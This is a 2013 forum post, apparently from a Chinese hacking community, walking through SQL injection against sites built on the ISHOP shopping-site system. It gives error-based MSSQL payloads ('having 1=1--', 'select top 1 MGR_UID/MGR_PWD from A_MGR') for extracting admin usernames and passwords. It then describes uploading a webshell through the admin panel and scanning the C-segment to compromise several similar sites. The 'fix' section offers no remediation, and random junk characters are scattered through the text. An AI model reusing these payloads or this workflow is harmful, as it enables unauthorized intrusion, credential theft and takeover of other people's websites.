找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2232|回复: 0
打印 上一主题 下一主题

ISHOP商场建站系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 17:40:38 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
发现一个注入点* _7 V7 h1 c2 `- ~/ w
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
) ]' F; [9 O( A. S2 U& q$ U# {  _2 H' m* e( t# d
习惯性的加’having1=1--
7 s9 P# k1 M% L% F4 I" _' Z) x- e, G  S% Q
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—9 }$ v( b% `4 ?; f5 n
# Y$ l3 {$ W9 N
0
6 C. c3 Z. M' `( N- |, j" q8 X5 Z+ W- ~$ W8 m' Z' w4 k' f
爆出Diary_A.dl_Title(这时候很激动啊)
; n4 r& x7 ^  W# B
- f7 u7 p, _3 S" f那么继续
  y4 y, r: T; u* t* }$ X( \http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
" d$ ^+ _2 L" \( L3 Z8 H% J- }5 \: u; ^6 R  F1 m
继续,一直爆下去
& p- c2 F) T/ \1 c$ [
( d' q1 O) J8 @+ ?; f# z; y) |! T$ ^爆到几个字段和表段 但是没找到需要的管理用户的字段
. c# s: u2 l% E7 [  H1 o
, R6 ~# O; A+ P2 ^蛋疼了 怎么办 然后去后台登陆页看源码* l1 m" U6 F- t1 n: I  s

7 q7 f8 z# L# \4 t5 l. e2 ^% z0
( y7 n3 q% K8 y9 G* c' R+ X/ \* j. q# D. G
Input name= “ADUID”# L2 `, o3 j3 t: Y
Input name= “ADPWD”
) n+ y: J+ d' k/ M* ?9 a1 Q7 Q% s8 q1 ]0 b
很幸运 找到了字段那就继续
# m  f" U0 B, W1 @' ~找到之后开始爆用户
4 i4 ?$ L) [* U0 b: V- O8 F1 Ahttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—9 ~, U* g. H7 c/ O
爆密码
) R# Q' s- b% p/ H% g5 vhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
- f7 {8 O* Z' F1 H' T测试了下 这个注入点只能爆到文章哪里的表 : ]* g6 E5 f1 B  S! T$ U

/ v+ b; l3 E5 e" b* ~头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
$ p4 e" s0 O3 ~- t9 N- ~' v9 B: U, ]  t+ l7 F3 i, r9 f0 g- v- u% O
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
& F. z9 s% H2 n7 ^; c: Q
, @, G( }9 H4 x5 g3 D* w473
8 `& s* p9 W# d  A% V4 r# [$ z+ C, v" w, _, @
进后台
( R$ E  N* V+ T# c) M% W# [5 U/ c: u  Z
! n  C/ D* J. l! H/ |
发现几个上传点 有的地方不能上传 而且防止恶意代码$ K6 ^: `$ b- R! f# Q" d( p
" G' I$ I0 i. y2 N! E8 l
没办法 各种百度各种找大牛 找到一只好像可以突破的马
: p! |0 |, i( G! A& \7 A1 J. p# W& R& m
8 Q) G$ s* K1 }+ k) G! ^- @
在系统管理那里直接上传 不过没有显示地址
1 i+ S  m- y5 Q* {1 T. l7 k. |
; n# K4 i3 J& J/ Y- E; t再上传一次 抓包 搞定OK
% @: D7 C1 u, p  B' g  h! E& H: ^9 Z
# X7 Y5 M: I* v, ~% m9 u1 A3 H
, ~+ \& r, V9 x6 U1 _' A8 M& H
472
* A1 z1 Y) j! ]/ b  q, k% f# }, S0 m, @( G
晚上不行了 去睡觉。。。  F5 a9 \3 _. B3 `. N
第二天刚起床 闲的没事做继续日站吧
% R2 X7 i( ?' v. ?2 X: s6 Q* ^8 o: j) x9 z' ~$ s. [9 f0 Y2 Z
找个站 就把这个站的旁c扫了下( U# y4 I  F. p8 |- }

% C/ J+ g* d: p% g- D发现c段也有一个购物站 ,然后还和这个站的模板差不多
  n8 Z- y8 O1 G1 r' v- |3 o9 U& ]6 d; Y; h+ q0 u4 Q
就找到会员登录口测试
' `0 p( K; B3 r  p6 S
3 o- R2 Y7 k; J, B+ Z'and (select top 1 MGR_UID from A_MGR)>0—
0 R4 B+ u' B  M- k- }果断爆到了 这时候我很激动 通杀
0 v* l  F* h$ Z7 a& s1 E2 p; l0 d: e. O
再次翻c段0 [% x: ^7 K" |& p, }$ p
- x, `7 X* q, R3 j
翻出几个站 都成功拿下4 b4 @5 c8 o/ }! C: M2 f

4 e! M9 d1 p6 }5 s" E" U9 c% a" O
$ G- y; X! s4 M  I: G/ k/ j4 J* m
修复方案:
  v3 q5 q! j  \' c他们比我专业 7 H# G' p3 E/ j6 v3 h

. ^" p0 O: t8 c% v& _6 y9 f" c" ^

$ X' ~2 B: |# _) A& T) g9 M% I
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表